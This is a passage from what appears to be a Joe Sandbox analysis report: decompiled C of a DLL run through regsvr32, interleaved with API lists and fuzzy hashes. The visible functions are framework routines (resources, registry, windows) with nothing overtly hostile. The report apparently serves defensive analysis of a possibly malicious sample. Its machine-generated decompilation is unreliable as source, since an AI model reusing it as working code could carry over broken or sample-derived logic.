                                                                                                                					} else {
                                                                                                                						_t35 = _t40[6];
                                                                                                                						_t23 = _t40[9] & 0x0000ffff;
                                                                                                                						_t34 = _t40[0xa] & 0x0000ffff;
                                                                                                                					}
                                                                                                                					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
                                                                                                                						_t30 = 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if( *(_t37 + 0x58) != 0) {
                                                                                                                					FreeResource(_v8);
                                                                                                                				}
                                                                                                                				return _t30;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 1002109E
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 100210A6
                                                                                                                • LockResource.KERNEL32(00000000), ref: 100210B8
                                                                                                                • FreeResource.KERNEL32(00000000), ref: 10021102
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: d528c3fad0c3a46e30780e7f4eed2554d17a32d32ebd42800b60d3eeab54a9ed
                                                                                                                • Instruction ID: 37c5069c528ee4cadaa7fde53341d746ed2c2c5db8b8d058b8015556b7038628
                                                                                                                • Opcode Fuzzy Hash: d528c3fad0c3a46e30780e7f4eed2554d17a32d32ebd42800b60d3eeab54a9ed
                                                                                                                • Instruction Fuzzy Hash: D211C138900791EBD760CFA5E8C5AEAB7F8FF18395F508429E84253950D7B0ED91DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E10025DDD(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t37;
                                                                                                                				intOrPtr _t43;
                                                                                                                				void* _t45;
                                                                                                                				intOrPtr* _t51;
                                                                                                                				void* _t52;
                                                                                                                				void* _t53;
                                                                                                                
                                                                                                                				_t53 = __eflags;
                                                                                                                				_t46 = __ecx;
                                                                                                                				_t44 = __ebx;
                                                                                                                				_push(4);
                                                                                                                				E1003D1E6(E10053AA1, __ebx, __edi, __esi);
                                                                                                                				_t51 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
                                                                                                                				E10023679(__ebx, __ecx, __edi, __ecx, _t53);
                                                                                                                				_t54 =  *((intOrPtr*)(_t52 + 8));
                                                                                                                				 *((intOrPtr*)(_t52 - 4)) = 0;
                                                                                                                				 *_t51 = 0x1005bd84;
                                                                                                                				if( *((intOrPtr*)(_t52 + 8)) == 0) {
                                                                                                                					 *((intOrPtr*)(_t51 + 0x50)) = 0;
                                                                                                                				} else {
                                                                                                                					_t43 = E10040F00( *((intOrPtr*)(_t52 + 8)));
                                                                                                                					_pop(_t46);
                                                                                                                					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
                                                                                                                				}
                                                                                                                				_t45 = E10023187(_t44, 0, _t51, _t54);
                                                                                                                				_t55 = _t45;
                                                                                                                				if(_t45 == 0) {
                                                                                                                					L4:
                                                                                                                					E1001729E(_t45, _t46, 0, _t51, _t55);
                                                                                                                				}
                                                                                                                				_t7 = _t45 + 0x74; // 0x74
                                                                                                                				_t46 = _t7;
                                                                                                                				_t37 = E10022D0E(_t45, _t7, 0, _t51, _t55);
                                                                                                                				if(_t37 == 0) {
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t37 + 4)) = _t51;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
                                                                                                                				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
                                                                                                                				 *((intOrPtr*)(_t45 + 4)) = _t51;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x44)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x64)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x68)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x54)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x60)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x88)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x58)) = 0;
                                                                                                                				 *((short*)(_t51 + 0x92)) = 0;
                                                                                                                				 *((short*)(_t51 + 0x90)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x48)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x80)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x84)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x70)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x74)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x94)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
                                                                                                                				return E1003D2BE(_t51);
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10025DE4
                                                                                                                  • Part of subcall function 10023679: __EH_prolog3.LIBCMT ref: 10023680
                                                                                                                • __strdup.LIBCMT ref: 10025E06
                                                                                                                • GetCurrentThread.KERNEL32(00000004,1000A65A,00000000), ref: 10025E33
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 10025E3C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                • String ID:
                                                                                                                • API String ID: 4206445780-0
                                                                                                                • Opcode ID: 26b724fd71b170f2f7d93e67b3ca549c0f651ba440e2322baf1848e9fc302bfc
                                                                                                                • Instruction ID: 69c9ff5aae974ac4f189f39486c0ec518028443b1793287df8902fa5d220694b
                                                                                                                • Opcode Fuzzy Hash: 26b724fd71b170f2f7d93e67b3ca549c0f651ba440e2322baf1848e9fc302bfc
                                                                                                                • Instruction Fuzzy Hash: B9219CB4800B509FC721DF3A958124AFBF8FFA4200F50891FE5AA87A22CBB1A540CF55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E1002937E(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                				void* _v8;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t18;
                                                                                                                				struct HRSRC__* _t25;
                                                                                                                				void* _t28;
                                                                                                                				intOrPtr* _t34;
                                                                                                                				void* _t36;
                                                                                                                				intOrPtr _t37;
                                                                                                                				struct HINSTANCE__* _t39;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t28 = 0;
                                                                                                                				_t40 = _a8;
                                                                                                                				_push(_t36);
                                                                                                                				_t34 = __ecx;
                                                                                                                				_v8 = 0;
                                                                                                                				if(_a8 == 0) {
                                                                                                                					L4:
                                                                                                                					_t37 = _a4;
                                                                                                                					_a8 = 1;
                                                                                                                					if(_t28 != 0) {
                                                                                                                						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
                                                                                                                						if(_v8 != 0) {
                                                                                                                							FreeResource(_v8);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
                                                                                                                					}
                                                                                                                					_t18 = _a8;
                                                                                                                					L10:
                                                                                                                					return _t18;
                                                                                                                				}
                                                                                                                				_t39 =  *(E10023187(0, __ecx, _t36, _t40) + 0xc);
                                                                                                                				_t25 = FindResourceA(_t39, _a8, 0xf0);
                                                                                                                				if(_t25 == 0) {
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				_t18 = LoadResource(_t39, _t25);
                                                                                                                				_v8 = _t18;
                                                                                                                				if(_t18 == 0) {
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                				_t28 = LockResource(_t18);
                                                                                                                				goto L4;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 100293A2
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 100293AE
                                                                                                                • LockResource.KERNEL32(00000000), ref: 100293BC
                                                                                                                • FreeResource.KERNEL32(00000000), ref: 100293EA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: 5af04dd84c9b52f8aeeedbf93178655b1a555a9ce55ea9392d42dbc39d498ac5
                                                                                                                • Instruction ID: 9bdba6c0fab6c6351b878234aa9a26aa11921052e12c3a0b54013c632e254e4e
                                                                                                                • Opcode Fuzzy Hash: 5af04dd84c9b52f8aeeedbf93178655b1a555a9ce55ea9392d42dbc39d498ac5
                                                                                                                • Instruction Fuzzy Hash: 9D113675600215EFDB00DFA5D888EAE7BB8EF083A0F408069F905972A0CB75AE00CF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E1003574C(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v24;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t13;
                                                                                                                				CHAR* _t21;
                                                                                                                				char* _t24;
                                                                                                                				intOrPtr _t28;
                                                                                                                				void* _t30;
                                                                                                                				signed int _t31;
                                                                                                                
                                                                                                                				_t28 = __edx;
                                                                                                                				_t13 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v8 = _t13 ^ _t31;
                                                                                                                				_t24 = _a8;
                                                                                                                				_t30 = __ecx;
                                                                                                                				_t29 = _a4;
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                                                                                                                					E1003D5FB( &_v24, 0x10, 0x10058714, _a12);
                                                                                                                					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
                                                                                                                				} else {
                                                                                                                					_t30 = E10035706(__ecx, _t29);
                                                                                                                					if(_t30 != 0) {
                                                                                                                						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
                                                                                                                						_t29 = _t21;
                                                                                                                						RegCloseKey(_t30);
                                                                                                                						_t18 = 0 | _t21 == 0x00000000;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return E1003B437(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10035785
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 1003578E
                                                                                                                • _swprintf.LIBCMT ref: 100357AB
                                                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 100357BC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 4210924919-0
                                                                                                                • Opcode ID: 2e4dec9075544ce2c900b159fe794254a27153a3eb4fab9f5e1b0bd901e46e0e
                                                                                                                • Instruction ID: 278628be86197373813511e97cf85c016d5c4ca0e1735458447dfde049ff078b
                                                                                                                • Opcode Fuzzy Hash: 2e4dec9075544ce2c900b159fe794254a27153a3eb4fab9f5e1b0bd901e46e0e
                                                                                                                • Instruction Fuzzy Hash: FC01C076900319EFEB11DB649C85FAF73ACEF08715F000419FA01AB191DB74ED0487A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E1001B928(intOrPtr* __ecx) {
                                                                                                                				char _v20;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr* __esi;
                                                                                                                				struct HWND__* _t18;
                                                                                                                				void* _t24;
                                                                                                                				intOrPtr _t29;
                                                                                                                				intOrPtr* _t33;
                                                                                                                
                                                                                                                				_t28 = __ecx;
                                                                                                                				_push(0);
                                                                                                                				_t33 = __ecx;
                                                                                                                				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
                                                                                                                					__eax =  *__esi;
                                                                                                                					__ecx = __esi;
                                                                                                                					__eax =  *((intOrPtr*)( *__esi + 0x170))();
                                                                                                                				}
                                                                                                                				_t30 = SendMessageA;
                                                                                                                				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
                                                                                                                				E1001A586(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
                                                                                                                				_t28 = _t33;
                                                                                                                				_t33 = E1001B075(0, _t28, SendMessageA);
                                                                                                                				if(_t33 != 0) {
                                                                                                                					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
                                                                                                                					E1001A586(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
                                                                                                                					_t18 = GetCapture();
                                                                                                                					if(_t18 != 0) {
                                                                                                                						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
                                                                                                                					}
                                                                                                                					return _t18;
                                                                                                                				} else {
                                                                                                                					_push(_t28);
                                                                                                                					_v20 = 0x1006c938;
                                                                                                                					E1003D2F0( &_v20, 0x1006522c);
                                                                                                                					asm("int3");
                                                                                                                					_push(4);
                                                                                                                					E1003D1E6(E10052A8D, 0, SendMessageA, _t33);
                                                                                                                					_t29 = E1002D12C(0x104);
                                                                                                                					_v32 = _t29;
                                                                                                                					_t24 = 0;
                                                                                                                					_v20 = 0;
                                                                                                                					if(_t29 != 0) {
                                                                                                                						_t24 = E10022AE3(_t29);
                                                                                                                					}
                                                                                                                					return E1003D2BE(_t24);
                                                                                                                				}
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 1001B952
                                                                                                                • SendMessageA.USER32 ref: 1001B97D
                                                                                                                  • Part of subcall function 1001A586: GetTopWindow.USER32(00000000), ref: 1001A594
                                                                                                                • GetCapture.USER32 ref: 1001B98F
                                                                                                                • SendMessageA.USER32 ref: 1001B99E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CaptureWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 729421689-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E10039C69(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				int _v8;
                                                                                                                				int _t21;
                                                                                                                				intOrPtr _t32;
                                                                                                                				int _t36;
                                                                                                                				void* _t46;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t46 = __ecx;
                                                                                                                				_t36 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                                                                                                				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                                                                                                				_v8 = _t21;
                                                                                                                				OffsetRect(__ecx + 0x28, _t36, _t21);
                                                                                                                				OffsetRect(_t46 + 0x48, _t36, _v8);
                                                                                                                				OffsetRect(_t46 + 0x38, _t36, _v8);
                                                                                                                				OffsetRect(_t46 + 0x58, _t36, _v8);
                                                                                                                				_t48 =  *((intOrPtr*)(_t46 + 0x80));
                                                                                                                				 *((intOrPtr*)(_t46 + 4)) = _a4;
                                                                                                                				 *((intOrPtr*)(_t46 + 8)) = _a8;
                                                                                                                				if( *((intOrPtr*)(_t46 + 0x80)) == 0) {
                                                                                                                					_t32 = E100397BC();
                                                                                                                				} else {
                                                                                                                					_t32 = 0;
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t46 + 0x74)) = _t32;
                                                                                                                				return E10039B0A(_t46, _t48, 0);
                                                                                                                			}









                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: OffsetRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 177026234-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 53%
                                                                                                                			E10030D58(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, RECT* _a8, int _a12) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				struct tagRECT _v28;
                                                                                                                				intOrPtr _t35;
                                                                                                                
                                                                                                                				_t35 = _a4;
                                                                                                                				E100231D3( &_v12, __eflags,  *((intOrPtr*)(_t35 - 0xb0)));
                                                                                                                				if(_a8 != 0) {
                                                                                                                					IntersectRect( &_v28, _a8, _t35 - 0x9c);
                                                                                                                					EqualRect( &_v28, _a8);
                                                                                                                				} else {
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                				}
                                                                                                                				if(IsRectEmpty( &_v28) == 0) {
                                                                                                                					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t35 - 0xac)) + 0x20)) + 0x20),  &_v28, _a12);
                                                                                                                				}
                                                                                                                				if(_v8 != 0) {
                                                                                                                					_push(_v12);
                                                                                                                					_push(0);
                                                                                                                					E10022A6E();
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3354205298-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E100205FF(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                				void* _v8;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t9;
                                                                                                                				void* _t11;
                                                                                                                				int _t13;
                                                                                                                				void* _t23;
                                                                                                                				void* _t29;
                                                                                                                				intOrPtr* _t31;
                                                                                                                				void* _t33;
                                                                                                                				void* _t35;
                                                                                                                				void* _t36;
                                                                                                                
                                                                                                                				_t29 = __edx;
                                                                                                                				_push(__ecx);
                                                                                                                				_t23 = __ecx;
                                                                                                                				_t9 = E100160BC(__eflags, 0x10);
                                                                                                                				_t38 = _t9;
                                                                                                                				if(_t9 == 0) {
                                                                                                                					_t31 = 0;
                                                                                                                					__eflags = 0;
                                                                                                                				} else {
                                                                                                                					_t31 = E100205E2(_t9, _t38);
                                                                                                                				}
                                                                                                                				_t11 = GetCurrentProcess();
                                                                                                                				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
                                                                                                                				_t35 = _t33;
                                                                                                                				if(_t13 == 0) {
                                                                                                                					if(_t31 != 0) {
                                                                                                                						 *((intOrPtr*)( *_t31 + 4))(1);
                                                                                                                					}
                                                                                                                					L10034CC4(_t23, _t29, _t31, _t35, _t36, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t31 + 4)) = _v8;
                                                                                                                				 *((intOrPtr*)(_t31 + 8)) =  *((intOrPtr*)(_t23 + 8));
                                                                                                                				return _t31;
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                  • Part of subcall function 100160BC: _malloc.LIBCMT ref: 100160D6
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10020631
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 10020637
                                                                                                                • DuplicateHandle.KERNEL32 ref: 1002063A
                                                                                                                • GetLastError.KERNEL32(?), ref: 10020655
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3704204646-0
                                                                                                                • Opcode ID: f0855671d130da4307ebdb28cad3a0a7dba719d4943ec5b7bcc1ed41e00b3058
                                                                                                                • Instruction ID: ad1c0d4b6581f717df2baf2ad377bc02e9e26d73043d96e5552e2c124fb605e8
                                                                                                                • Opcode Fuzzy Hash: f0855671d130da4307ebdb28cad3a0a7dba719d4943ec5b7bcc1ed41e00b3058
                                                                                                                • Instruction Fuzzy Hash: 81018F35700304AFEB10DBA5DC8AF5A7BADEF88350F544425F909CB282DBB1EC108B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E100391D9(void* __ebx, void* __ecx, void* __edx, struct tagPOINT* _a8) {
                                                                                                                				struct tagPOINT _v12;
                                                                                                                				void* __edi;
                                                                                                                				struct tagPOINT* _t8;
                                                                                                                				struct HWND__* _t9;
                                                                                                                				int _t14;
                                                                                                                				long _t19;
                                                                                                                				void* _t20;
                                                                                                                				struct HWND__* _t22;
                                                                                                                				struct HWND__* _t23;
                                                                                                                				struct HWND__* _t26;
                                                                                                                
                                                                                                                				_t20 = __edx;
                                                                                                                				_t8 = _a8;
                                                                                                                				_v12.x = _t8->x;
                                                                                                                				_t19 = _t8->y;
                                                                                                                				_push(_t19);
                                                                                                                				_v12.y = _t19;
                                                                                                                				_t9 = WindowFromPoint( *_t8);
                                                                                                                				_t26 = _t9;
                                                                                                                				if(_t26 != 0) {
                                                                                                                					_t22 = GetParent(_t26);
                                                                                                                					if(_t22 == 0 || E1002D888(__ebx, _t20, _t22, _t22, 2) == 0) {
                                                                                                                						ScreenToClient(_t26,  &_v12);
                                                                                                                						_t23 = E1002D92A(_t26, _v12.x, _v12.y);
                                                                                                                						if(_t23 == 0) {
                                                                                                                							L6:
                                                                                                                							_t9 = _t26;
                                                                                                                						} else {
                                                                                                                							_t14 = IsWindowEnabled(_t23);
                                                                                                                							_t9 = _t23;
                                                                                                                							if(_t14 != 0) {
                                                                                                                								goto L6;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t9 = _t22;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t9;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • WindowFromPoint.USER32 ref: 100391F0
                                                                                                                • GetParent.USER32(00000000), ref: 100391FE
                                                                                                                • ScreenToClient.USER32(00000000,?), ref: 1003921F
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 10039238
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientEnabledFromParentPointScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1871804413-0
                                                                                                                • Opcode ID: 84270237000b18f83030caffc3fae3ed150ba6c8441a5cec9de69d9265afa8ff
                                                                                                                • Instruction ID: ec4f3300151b1357f416a4749fb9b5f57edc85e01cc0252f9785ffbf3cfa21de
                                                                                                                • Opcode Fuzzy Hash: 84270237000b18f83030caffc3fae3ed150ba6c8441a5cec9de69d9265afa8ff
                                                                                                                • Instruction Fuzzy Hash: AA018B3A600924BFD703DB999C48DAF7ABDEF8D682F114129F901DB210EB30DE019B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
